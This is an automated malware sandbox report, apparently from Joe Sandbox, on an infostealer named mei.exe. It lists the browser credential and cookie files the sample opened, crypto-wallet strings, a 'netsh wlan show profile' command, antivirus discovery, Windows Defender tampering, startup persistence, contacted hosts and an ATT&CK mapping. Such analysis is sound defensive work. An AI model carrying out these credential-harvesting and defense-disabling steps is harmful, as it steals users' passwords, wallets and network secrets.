              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_ssl.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs VolumeInformation
              Source: C:\Users\user\Desktop\mei.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformation
              Source: C:\Users\user\Desktop\mei.exe Queries volume information: C:\Users\user\Desktop\mei.exe VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\tree.com Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\mei.exe Code function: 0_2_00007FF6313DC410 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00007FF6313DC410
              Source: C:\Users\user\Desktop\mei.exe Code function: 0_2_00007FF6313F6220 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation, 0_2_00007FF6313F6220
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe Code function: 89_2_00007FF7D7A048CC GetModuleFileNameW,GetVersionExW,LoadLibraryW,LoadLibraryW, 89_2_00007FF7D7A048CC
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

              Stealing of Sensitive Information

              Source: Yara match File source: 00000001.00000002.2033404601.000002E914078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.2025311292.000002E9140EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.2024331712.000002E915056000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.2025311292.000002E914078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000003.1656841633.000001FFF1DDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.2027450507.000002E914078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.1677159074.000002E913C21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.2028624518.000002E914078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.2027051613.000002E9140F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000002.2034518667.000002E9140FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000003.1656841633.000001FFF1DD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: mei.exe PID: 7468, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: mei.exe PID: 7484, type: MEMORYSTR
              Source: Yara match File source: C:\Users\user\AppData\Local\Temp\_MEI74682\rarreg.key, type: DROPPED
              Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Electrum
              Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: com.liberty.jaxx
              Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Exodus
              Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Ethereum
              Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: keystore
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
              Source: C:\Users\user\Desktop\mei.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: Yara match | File source: 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: mei.exe PID: 7484, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match | File source: 00000001.00000002.2033404601.000002E914078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000003.2025311292.000002E9140EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000003.2024331712.000002E915056000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000003.2025311292.000002E914078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000003.1656841633.000001FFF1DDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000003.2027450507.000002E914078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000003.1677159074.000002E913C21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000003.2028624518.000002E914078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000003.2027051613.000002E9140F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000002.2034518667.000002E9140FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000003.1656841633.000001FFF1DD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: mei.exe PID: 7468, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: mei.exe PID: 7484, type: MEMORYSTR
              Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\_MEI74682\rarreg.key, type: DROPPED
              Source: Yara match | File source: Process Memory Space: mei.exe PID: 7484, type: MEMORYSTR
              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact | Resource Development | Reconnaissance
              Valid Accounts241
              Windows Management Instrumentation
              11
              DLL Side-Loading
              11
              DLL Side-Loading
              4
              Disable or Modify Tools
              1
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              Exfiltration Over Other Network Medium1
              Ingress Tool Transfer
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
              System Shutdown/Reboot
              Acquire InfrastructureGather Victim Identity Information
              Default Accounts2
              Native API
              12
              Registry Run Keys / Startup Folder
              1
              Access Token Manipulation
              11
              Deobfuscate/Decode Files or Information
              LSASS Memory2
              File and Directory Discovery
              Remote Desktop Protocol2
              Data from Local System
              Exfiltration Over Bluetooth21
              Encrypted Channel
              SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
              Domain Accounts212
              Command and Scripting Interpreter
              Logon Script (Windows)11
              Process Injection
              21
              Obfuscated Files or Information
              Security Account Manager48
              System Information Discovery
              SMB/Windows Admin Shares1
              Clipboard Data
              Automated Exfiltration3
              Non-Application Layer Protocol
              Data Encrypted for ImpactDNS ServerEmail Addresses
              Local Accounts3
              PowerShell
              Login Hook12
              Registry Run Keys / Startup Folder
              11
              Software Packing
              NTDS251
              Security Software Discovery
              Distributed Component Object ModelInput CaptureTraffic Duplication4
              Application Layer Protocol
              Data DestructionVirtual Private ServerEmployee Names
              Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Timestomp
              LSA Secrets2
              Process Discovery
              SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
              Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
              DLL Side-Loading
              Cached Domain Credentials141
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
              External Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Masquerading
              DCSync1
              Application Window Discovery
              Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
              Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Modify Registry
              Proc Filesystem1
              System Network Configuration Discovery
              Cloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies
              Exploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt141
              Virtualization/Sandbox Evasion
              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedExfiltration Over Symmetric Encrypted Non-C2 ProtocolWeb ProtocolsInternal DefacementMalvertisingNetwork Topology
              Supply Chain CompromisePowerShellCronCron1
              Access Token Manipulation
              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingExfiltration Over Asymmetric Encrypted Non-C2 ProtocolFile Transfer ProtocolsExternal DefacementCompromise InfrastructureIP Addresses
              Compromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
              Process Injection
              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingExfiltration Over Unencrypted Non-C2 ProtocolMail ProtocolsFirmware CorruptionDomainsNetwork Security Appliances

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              Behavior Graph ID: 1354458 | Sample: mei.exe | Startdate: 06/12/2023 | Architecture: WINDOWS | Score: 100
              Start
                DNS/IP: discord.com; ip-api.com; blank-kwj1y.in
                Signatures: Found malware configuration; Antivirus detection for URL or domain; Antivirus detection for dropped file; 7 other signatures
                mei.exe 62 (started)
                  Dropped: C:\Users\user\AppData\...\unicodedata.pyd, PE32+; C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32+; C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+; 56 other malicious files
                  Signatures: Very long command line found; Drops PE files with a suspicious file extension; Drops PE files to the startup folder; 4 other signatures
                  mei.exe 1 30 (started)
                    DNS/IP: discord.com 162.159.136.232, 443, 49743 CLOUDFLARENETUS United States; ip-api.com 208.95.112.1, 49734, 49742, 80 TUT-ASUS United States
                    Dropped: C:\ProgramData\Microsoft\Windows\...\.scr, PE32+
                    Signatures: Very long command line found; Found many strings related to Crypto-Wallets (likely being stolen); Tries to harvest and steal browser information (history, passwords, etc); 4 other signatures
                    cmd.exe 1 (started)
                      Signatures: Suspicious powershell command line found; Very long command line found; Uses cmd line tools excessively to alter registry or file data; 2 other signatures
                      2 other processes
                    cmd.exe (started)
                      Signatures: Encrypted powershell cmdline option found
                      powershell.exe (started)
                        Dropped: C:\Users\user\AppData\...\wgovk1sp.cmdline, Unicode
                        csc.exe (started)
                          Dropped: C:\Users\user\AppData\Local\...\wgovk1sp.dll, PE32
                          cvtres.exe (started)
                      conhost.exe (started)
                    cmd.exe 1 (started)
                      Signatures: Modifies Windows Defender protection settings; Removes signatures from Windows Defender
                      powershell.exe 22 (started)
                        Signatures: Potential dropper URLs found in powershell memory
                      2 other processes
                    30 other processes
                      Signatures: Adds a directory exclusion to Windows Defender; Tries to harvest and steal WLAN passwords
                      getmac.exe (started)
                        Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Writes or reads registry keys via WMI
                      WMIC.exe (started)
                        Signatures: DLL side loading technique detected
                      WMIC.exe (started)
                      57 other processes

              Source | Detection | Scanner | Label | Link
              mei.exe | 49% | Virustotal | | Browse
              mei.exe | 100% | Avira | HEUR/AGEN.1351111 |
              Source | Detection | Scanner | Label | Link
              C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr | 100% | Avira | HEUR/AGEN.1351111 |
              C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr | 35% | ReversingLabs | Win64.Trojan.Generic |
              C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr | 49% | Virustotal | | Browse
              C:\Users\user\AppData\Local\Temp\_MEI74682\VCRUNTIME140.dll | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Temp\_MEI74682\VCRUNTIME140.dll | 0% | Virustotal | | Browse
              C:\Users\user\AppData\Local\Temp\_MEI74682\_bz2.pyd | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Temp\_MEI74682\_bz2.pyd | 1% | Virustotal | | Browse
              C:\Users\user\AppData\Local\Temp\_MEI74682\_ctypes.pyd | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Temp\_MEI74682\_ctypes.pyd | 0% | Virustotal | | Browse
              C:\Users\user\AppData\Local\Temp\_MEI74682\_decimal.pyd | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Temp\_MEI74682\_decimal.pyd | 3% | Virustotal | | Browse
              C:\Users\user\AppData\Local\Temp\_MEI74682\_hashlib.pyd | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Temp\_MEI74682\_hashlib.pyd | 0% | Virustotal | | Browse
              C:\Users\user\AppData\Local\Temp\_MEI74682\_lzma.pyd | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Temp\_MEI74682\_lzma.pyd | 3% | Virustotal | | Browse
              C:\Users\user\AppData\Local\Temp\_MEI74682\_queue.pyd | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Temp\_MEI74682\_queue.pyd | 0% | Virustotal | | Browse
              C:\Users\user\AppData\Local\Temp\_MEI74682\_socket.pyd | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Temp\_MEI74682\_socket.pyd | 1% | Virustotal | | Browse
